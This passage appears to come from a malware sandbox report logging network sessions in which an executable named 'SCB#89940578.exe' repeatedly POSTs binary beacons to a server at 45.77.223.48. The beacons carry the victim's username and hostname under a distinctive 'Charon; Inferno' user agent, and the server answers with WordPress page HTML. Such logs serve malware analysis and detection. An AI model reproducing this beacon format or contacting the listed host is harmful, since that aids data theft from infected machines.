                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:39.631551027 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            62192.168.2.44980545.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:40.002815962 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:40.191472054 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:41.096502066 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:40 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:41.096561909 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:41.096579075 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:41.106626987 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:41.107115984 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:41.107374907 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:41.107525110 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:41.107817888 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:41.107883930 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:41.107952118 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            63192.168.2.44980645.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:41.435996056 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:41.624288082 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:42.566795111 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:41 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:42.566847086 CEST64INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
                                            Apr 26, 2024 04:43:42.566884041 CEST77INData Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:42.576086044 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:42.576564074 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:42.576620102 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:42.576788902 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:42.576922894 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:42.577071905 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                            Apr 26, 2024 04:43:42.755841970 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                            Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            64192.168.2.44980745.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:42.908988953 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:43.096909046 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:44.010294914 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:43 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:44.010323048 CEST64INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8
                                            Apr 26, 2024 04:43:44.010523081 CEST77INData Raw: 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: " /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:44.020178080 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:44.020514965 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:44.020759106 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:44.020901918 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:44.021147966 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                            Apr 26, 2024 04:43:44.021224976 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                            Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                            Apr 26, 2024 04:43:44.021245956 CEST761INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                            Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            65192.168.2.44980845.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:44.358397961 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:44.546508074 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:45.032583952 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:45.615983009 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:44 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:45.616070032 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                            Apr 26, 2024 04:43:45.616192102 CEST11INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09
                                            Data Ascii: UTF-8" />
                                            Apr 26, 2024 04:43:45.616357088 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                            Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:45.638055086 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:45.643618107 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:45.644862890 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:45.644897938 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                            Apr 26, 2024 04:43:45.645163059 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                            Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            66192.168.2.44980945.77.223.48807272C:\Users\user\Desktop\SCB#89940578.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 26, 2024 04:43:45.956579924 CEST246OUTPOST /~blog/?ajax=posts.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.77.223.48
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: 3E699C10
                                            Content-Length: 149
                                            Connection: close
                                            Apr 26, 2024 04:43:46.146183014 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                            Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                            Apr 26, 2024 04:43:47.149636030 CEST215INHTTP/1.1 200 OK
                                            Date: Fri, 26 Apr 2024 02:43:46 GMT
                                            Server: Apache
                                            Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Apr 26, 2024 04:43:47.149914026 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                            Apr 26, 2024 04:43:47.159240007 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                            Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                            Apr 26, 2024 04:43:47.159492016 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                            Data Ascii: <title>Natural biz blog</title>
                                            Apr 26, 2024 04:43:47.159635067 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                            Apr 26, 2024 04:43:47.159763098 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                            Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
